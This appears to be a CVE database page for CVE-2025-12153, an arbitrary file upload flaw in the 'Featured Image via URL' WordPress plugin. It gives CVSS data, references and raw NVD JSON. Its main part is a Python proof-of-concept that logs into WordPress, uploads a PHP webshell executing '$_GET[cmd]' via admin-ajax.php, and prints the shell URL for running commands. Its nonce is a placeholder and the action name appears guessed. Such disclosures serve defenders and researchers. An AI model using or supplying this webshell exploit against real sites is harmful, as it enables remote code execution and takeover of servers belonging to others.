Security Vulnerability Report

CVE-2025-12153

Published: 2025-12-05 06:16:06
Last Modified: 2026-04-15 00:35:42

Description

The Featured Image via URL plugin for WordPress is vulnerable to arbitrary file uploads due to a missing file type validation function in all versions up to, and including, 0.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files to the affected site's server, which may make remote code execution possible.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data is available in the CVE record. Affected product (from the description): Featured Image via URL plugin for WordPress, all versions up to and including 0.1.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-12153 PoC - Arbitrary File Upload
# Target: WordPress with Featured Image via URL plugin <= 0.1


def upload_webshell(target_url, username, password):
    """Upload malicious PHP file to achieve RCE"""
    session = requests.Session()

    # Step 1: Login to WordPress
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    session.post(login_url, data=login_data)

    # Step 2: Upload malicious PHP file via plugin endpoint
    upload_url = f"{target_url}/wp-admin/admin-ajax.php"
    # PHP webshell content
    php_shell = b'<?php system($_GET["cmd"]); ?>'
    files = {
        'file': ('shell.php', php_shell, 'application/x-php')
    }
    data = {
        'action': 'fivur_upload',
        'nonce': 'attacker_controlled_or_bruteforced'
    }
    response = session.post(upload_url, files=files, data=data)

    # Step 3: Execute commands via uploaded webshell
    if response.status_code == 200:
        shell_url = f"{target_url}/wp-content/uploads/shell.php"
        print(f"[+] Webshell uploaded: {shell_url}")
        print(f"[+] Execute commands: ?cmd=whoami")
        return shell_url
    else:
        print("[-] Upload failed")
        return None


if __name__ == "__main__":
    # Three positional arguments are expected, so argv must hold at least 4 entries
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    upload_webshell(target, user, pwd)
```

References

- https://wordpress.org/plugins/featured-image-via-url/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/9687a88f-ac5b-4746-a68c-91c358b5fb87?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12153",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-05T06:16:05.707",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Featured Image via URL plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation function in all versions up to, and including, 0.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-434"}]
      }
    ],
    "references": [
      {"url": "https://wordpress.org/plugins/featured-image-via-url/", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9687a88f-ac5b-4746-a68c-91c358b5fb87?source=cve", "source": "[email protected]"}
    ]
  }
}
```